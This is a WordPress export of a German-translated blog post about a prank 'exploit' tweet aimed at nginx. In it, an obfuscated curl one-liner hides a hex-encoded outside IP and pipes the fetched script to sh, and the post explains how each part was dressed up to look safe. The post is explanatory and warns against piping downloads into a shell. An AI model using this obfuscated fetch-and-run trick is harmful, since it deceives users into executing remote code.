{"id":35126,"date":"2019-10-31T22:02:28","date_gmt":"2019-10-31T19:02:28","guid":{"rendered":"https:\/\/prohoster.info\/blog\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\/"},"modified":"2019-10-31T22:02:28","modified_gmt":"2019-10-31T19:02:28","slug":"uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","status":"publish","type":"post","link":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","title":{"rendered":"Erfolg des sozialen Experiments mit dem gef\u00e4lschten Exploit f\u00fcr nginx","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<p><i><b>Hinweis.<\/b>: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\">Autor<\/a><\/noindex> In einem k\u00fcrzlich ver\u00f6ffentlichten Artikel vom 1. Juni entschied er sich, ein Experiment im Bereich der Informationssicherheit durchzuf\u00fchren. Dazu bereitete er einen gef\u00e4lschten Exploit f\u00fcr eine unentdeckte Schwachstelle in einem Webserver vor und ver\u00f6ffentlichte diesen auf seinem Twitter-Account. Seine Annahme, sofort von Fachleuten enttarnt zu werden, die den offensichtlichen Betrug im Code erkennen w\u00fcrden, stellte sich nicht nur als falsch heraus\u2026 Sie \u00fcbertraf alle Erwartungen, und zwar in die andere Richtung: Der Tweet erhielt gro\u00dfe Unterst\u00fctzung von zahlreichen Menschen, die den Inhalt nicht \u00fcberpr\u00fcften.<\/i><\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit dem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/20ff08c6f541176c68ef2c689b989389.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\n<b>TL;DR: Verwenden Sie auf keinen Fall die Dateiverarbeitung in sh oder bash. Das ist eine hervorragende M\u00f6glichkeit, die Kontrolle \u00fcber Ihren Computer zu verlieren.<\/b><noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<p>Ich m\u00f6chte eine kleine Geschichte \u00fcber einen scherzhaften PoC-Exploit teilen, der am 31. Mai erstellt wurde. Er erschien zeitnah als Antwort auf die Nachricht von <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">Alisa Esage Schewtschenko<\/a><\/noindex>, Mitglied der <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thezdi\">Zero Day Initiative<\/a><\/noindex> (ZDI) hat angek\u00fcndigt, dass bald Informationen \u00fcber eine Sicherheitsanf\u00e4lligkeit in NGINX ver\u00f6ffentlicht werden, die zu RCE (Remote Code Execution) f\u00fchren kann. Da NGINX die Grundlage f\u00fcr viele Websites bildet, hatte diese Neuigkeit potenziell eine explosive Wirkung. Allerdings waren die Einzelheiten aufgrund von Verz\u00f6gerungen im Prozess der 'verantwortungsvollen Offenlegung' nicht bekannt \u2014 so besagt das Standardverfahren von ZDI.<\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit dem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/fba47177ff2a2d05db7942f229e145b0.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\/status\/1134400951043874816\">Tweet<\/a><\/noindex> zur Offenlegung der Sicherheitsanf\u00e4lligkeit in NGINX<\/i><\/p>\n<p>Nachdem ich an einer neuen Obfuskationstechnik in curl gearbeitet hatte, zitierte ich den urspr\u00fcnglichen Tweet und 'leakte ein funktionierendes PoC', das aus einer einzigen Codezeile besteht, die angeblich die entdeckte Sicherheitsanf\u00e4lligkeit ausnutzt. Nat\u00fcrlich war das v\u00f6lliger Unsinn. Ich dachte, ich w\u00fcrde sofort entlarvt werden und im besten Fall w\u00fcrde ich ein paar Retweets bekommen (was auch in Ordnung w\u00e4re).<\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit dem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/30c8394a4bd7a151828bc3459f18f2f6.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i><noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/notdan\/status\/1134559331989434368\">Tweet<\/a><\/noindex> mit einem gef\u00e4lschten Exploit<\/i><\/p>\n<p>Aber ich konnte mir nicht vorstellen, was als N\u00e4chstes passierte. Die Popularit\u00e4t meines Tweets schoss durch die Decke. Erstaunlicherweise haben bis jetzt (15:00 MSK am 1. Juni) nur wenige erkannt, dass es sich um einen Fake handelt. Viele retweeten ihn, ohne \u00fcberhaupt zu \u00fcberpr\u00fcfen (geschweige denn die wundersch\u00f6ne ASCII-Grafik zu bewundern, die er ausgibt).<\/p>\n<p><img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit dem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/a22501843edc07cf0dc49b698b1048c2.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Schau dir diese Sch\u00f6nheit an!<\/i><\/p>\n<p>Obwohl all diese Zyklen und Farben gro\u00dfartig sind, ist es offensichtlich: Um sie zu sehen, mussten die Leute Code auf ihrer Maschine ausf\u00fchren. Gl\u00fccklicherweise funktionieren Browser \u00e4hnlich, und da ich keine rechtlichen Probleme haben m\u00f6chte, hat der Code auf meiner Seite nur Echo-Aufrufe gemacht, ohne zu versuchen, irgendeinen zus\u00e4tzlichen Code zu installieren oder auszuf\u00fchren.<\/p>\n<p>Ein kleiner Exkurs: <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/netspooky\">netspooky<\/a><\/noindex>, <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/dnoiz1\">dnz<\/a><\/noindex>, ich und die anderen Jungs vom Team <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/thugcrowd\">Thugcrowd<\/a><\/noindex> spielen schon eine Weile mit verschiedenen Methoden zur Obfuskation von curl-Befehlen, weil es Spa\u00df macht\u2026 und wir sind Nerds. Netspooky und dnz haben einige neue Ans\u00e4tze entdeckt, die ich extrem vielversprechend fand. Ich habe mich dem Spa\u00df angeschlossen und versucht, IP-dezimale Umwandlungen in die Tricks zu integrieren. Es stellte sich heraus, dass IPs auch in hexadezimale Formate umgewandelt werden k\u00f6nnen. Zudem \u201efressen\u201c curl und die meisten anderen NIX-Tools gerne hexadezimale IPs! Es war also nur notwendig, eine \u00fcberzeugende und sicher aussehende Eingabeaufforderung zu erstellen. Letztendlich habe ich mich f\u00fcr diese entschieden:<\/p>\n<pre><code class=\"plaintext\">curl -gsS https:\/\/127.0.0.1-OR-VICTIM-SERVER:443\/..\/..\/..\/%00\/nginx-handler?\/usr\/lib\/nginx\/modules\/ngx_stream_module.so:127.0.0.1:80:\/bin\/sh%00&lt;'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc \/dev\/tcp\/localhost<\/code><\/pre>\n<p><\/p>\n<h2>Sozio-elektronische Ingenieurwissenschaft (S.E.E.) \u2013 mehr als nur Phishing<\/h2>\n<p>\nSicherheit und Vertrautheit waren der zentrale Bestandteil dieses Experiments. Ich denke, genau diese Aspekte f\u00fchrten zu seinem Erfolg. Die Kommandozeile implizierte eindeutig Sicherheit, indem sie auf \u201e127.0.0.1\u201c verwies (jeder kennt localhost). Man geht davon aus, dass localhost sicher ist und die Daten ihn niemals verlassen.<\/p>\n<p>Vertrautheit war das zweite Schl\u00fcsselkomponente des S.E.E.-Experiments. Da die Zielgruppe gr\u00f6\u00dftenteils aus Personen bestand, die mit den Grundlagen der Computersicherheit vertraut sind, war es wichtig, einen Code zu erstellen, dessen Teile vertraut und somit sicher erscheinen. Die \u00dcbernahme von Elementen alter Exploit-Konzepte und deren ungew\u00f6hnliche Kombination war \u00e4u\u00dferst erfolgreich.<\/p>\n<p>Nachfolgend finden Sie eine detaillierte Analyse des Einzeilers. <i>Alles in dieser Liste hat <b>kosmetischen Charakter<\/b>, und f\u00fcr seine tats\u00e4chliche Funktion sind nahezu keine Anforderungen notwendig.<\/i><\/p>\n<p>Welche Komponenten sind tats\u00e4chlich notwendig? Das sind <code>-gsS<\/code>, <code>-O 0x0238f06a<\/code>, <code>|sh<\/code> und der Webserver selbst. Der Webserver enthielt keine sch\u00e4dlichen Anweisungen, sondern \u00fcbertrug einfach ASCII-Grafiken mit Hilfe von Befehlen <code>echo<\/code> im Skript, das enthalten ist in <code>index.html<\/code>. Wenn der Benutzer eine Zeile mit <code>|sh<\/code> in der Mitte eingab, <code>index.html<\/code> wurde geladen und ausgef\u00fchrt. Gl\u00fccklicherweise hatten die Betreiber des Webservers keine b\u00f6sartigen Absichten.<\/p>\n<ul>\n<li> <code>..\/..\/..\/%00<\/code> \u2014 stellt einen Verzeichnis\u00fcberschreitung dar;<\/li>\n<li> <code>ngx_stream_module.so<\/code> \u2014 der Pfad zu einem zuf\u00e4lligen NGINX-Modul;<\/li>\n<li> <code>\/bin\/sh%00&lt;'protocol:TCP'<\/code> \u2014 angeblich starten wir <code>\/bin\/sh<\/code> auf dem Zielrechner und leiten die Ausgabe in einen TCP-Kanal um;<\/li>\n<li> <code>-O 0x0238f06a#PLToffset<\/code> \u2014 eine geheime Zutat, erg\u00e4nzt mit <code>#PLToffset<\/code>, um wie ein Speicheroffset auszusehen, das irgendwie im PLT enthalten ist;<\/li>\n<li> <code>|sh;<\/code> \u2014 ein weiterer wichtiger Abschnitt. Wir mussten die Ausgabe an sh\/bash umleiten, um den Code auszuf\u00fchren, der vom angreifenden Webserver mit der Adresse <code>0x0238f06a<\/code> (<code>2.56.240.x<\/code>);<\/li>\n<li> <code>nc \/dev\/tcp\/localhost<\/code> \u2014 ein Platzhalter, bei dem netcat auf <code>\/dev\/tcp\/localhost<\/code>verweist, um alles wieder sicher erscheinen zu lassen. Tats\u00e4chlich tut es jedoch nichts und ist zur Sch\u00f6nheitszwecken in der Zeile enthalten.<\/li>\n<\/ul>\n<p>\nDamit endet die Entschl\u00fcsselung des Einzeilerskripts und die Diskussion \u00fcber Aspekte der \"sozio-elektronischen Ingenieurkunst\" (aufwendiger Phishing).<\/p>\n<h2>Die Konfiguration des Webservers und Gegenma\u00dfnahmen<\/h2>\n<p>\nDa die \u00fcberwiegende Mehrheit meiner Abonnenten IT-Sicherheitsexperten und Hacker sind, habe ich beschlossen, den Webserver ein wenig widerstandsf\u00e4higer gegen das \"Interesse\" von ihrer Seite zu machen, nur damit die Jungs etwas zu tun haben (und es macht auch Spa\u00df, ihn einzurichten). Ich werde hier nicht alle Fallen auflisten, da das Experiment noch l\u00e4uft, aber hier sind einige Dinge, die der Server tut:<\/p>\n<ul>\n<li> Er verfolgt aktiv Versuche zur Verbreitung in bestimmten sozialen Netzwerken und zeigt verschiedene Vorschau-Thumbnail-Bilder an, um den Benutzer zu ermutigen, auf den Link zu klicken.<\/li>\n<li> Er leitet Chrome\/Mozilla\/Safari usw. auf einen Promo-Clip von Thugcrowd um, anstatt das Shell-Skript anzuzeigen.<\/li>\n<li> Er \u00fcberwacht EVIDENTE Anzeichen f\u00fcr Eindringversuche\/Angriffe und leitet dann Anfragen zu NSA-Servern um (haha!).<\/li>\n<li> Er installiert einen Trojaner sowie ein BIOS-Rootkit auf allen Computern, deren Benutzer die Website mit einem regul\u00e4ren Browser besuchen (Spa\u00df!).<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Erfolg des sozialen Experiments mit dem gef\u00e4lschten Exploit f\u00fcr nginx\" src=\"\/wp-content\/uploads\/2019\/06\/8ea3f0c6e2e303bef6f9ba73370d6cf1.jpeg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<i>Ein kleiner Teil davon ist Anti-Mer<\/i><\/p>\n<p>In diesem Fall war mein einziges Ziel, einige Funktionen von Apache zu erlernen \u2013 insbesondere die coolen Weiterleitungsregeln \u2013 und ich dachte mir: Warum nicht?<\/p>\n<h2>Echter NGINX-Exploit!<\/h2>\n<p>\nFolgen Sie <noindex><a rel=\"nofollow\" href=\"https:\/\/twitter.com\/alisaesage\">@alisaesage<\/a><\/noindex> Folgen Sie uns auf Twitter und verfolgen Sie die gro\u00dfartige Arbeit von ZDI bei der Behebung echter Schwachstellen und Exploit-M\u00f6glichkeiten in NGINX. Ihre Arbeit hat mich immer fasziniert, und ich danke Alisa f\u00fcr ihre Geduld bez\u00fcglich aller Erw\u00e4hnungen und Benachrichtigungen, die durch meinen dummen Tweet verursacht wurden. Gl\u00fccklicherweise brachte er auch einige Vorteile: Erhalf, das Bewusstsein f\u00fcr NGINX-Sicherheitsanf\u00e4lligkeiten sowie die Probleme, die durch den Missbrauch von curl entstehen, zu sch\u00e4rfen.<br \/>\n<br \/>Quelle: <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/company\/flant\/blog\/454700\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f, [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":26410,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-35126","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.0.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f,\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.0.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 \u043e\u0436\u0438\u0434\u0430\u043d\u0438\u044f,\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2019-10-31T19:02:28+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47Erfolg des sozialen Experiments mit gef\u00e4lschter Exploitation f\u00fcr nginx | ProHoster","description":"Anmerkung des \u00dcbersetzers: Der Autor des urspr\u00fcnglichen Artikels, ver\u00f6ffentlicht am 1. Juni, beschloss, ein Experiment in der Community der Cybersicherheit interessierten Personen durchzuf\u00fchren. Dazu bereitete er einen gef\u00e4lschten Exploit f\u00fcr eine noch unbekannte Schwachstelle im Webserver vor und postete diesen in seinem Twitter. Seine Annahmen, sofort von den Spezialisten entlarvt zu werden, die den offensichtlichen Betrug im Code sehen w\u00fcrden, erf\u00fcllten sich nicht nur nicht... sie \u00fcbertrafen alle Erwartungen.","canonical_url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/uspeh-sotsialnogo-eksperimenta-s-poddelnym-eksplojtom-dlya-nginx","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u0423\u0441\u043f\u0435\u0445 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u043c \u0434\u043b\u044f nginx | ProHoster","og:description":"\u041f\u0440\u0438\u043c. \u043f\u0435\u0440\u0435\u0432.: \u0410\u0432\u0442\u043e\u0440 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0437\u0430\u043c\u0435\u0442\u043a\u0438, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0439 1 \u0438\u044e\u043d\u044f, \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043a \u043d\u0435\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0438 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b \u0435\u0433\u043e \u0432 \u0441\u0432\u043e\u0451\u043c \u0442\u0432\u0438\u0442\u0442\u0435\u0440\u0435. \u0415\u0433\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u2014 \u0431\u044b\u0442\u044c \u043c\u0433\u043d\u043e\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0437\u043e\u0431\u043b\u0430\u0447\u0451\u043d\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0432\u0438\u0434\u044f\u0442 \u043e\u0447\u0435\u0432\u0438\u0434\u043d\u044b\u0439 \u043e\u0431\u043c\u0430\u043d \u0432 \u043a\u043e\u0434\u0435, \u2014 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043d\u0435 \u043e\u043f\u0440\u0430\u0432\u0434\u0430\u043b\u0438\u0441\u044c\u2026 \u041e\u043d\u0438 \u043f\u0440\u0435\u0432\u0437\u043e\u0448\u043b\u0438 \u0432\u0441\u0435 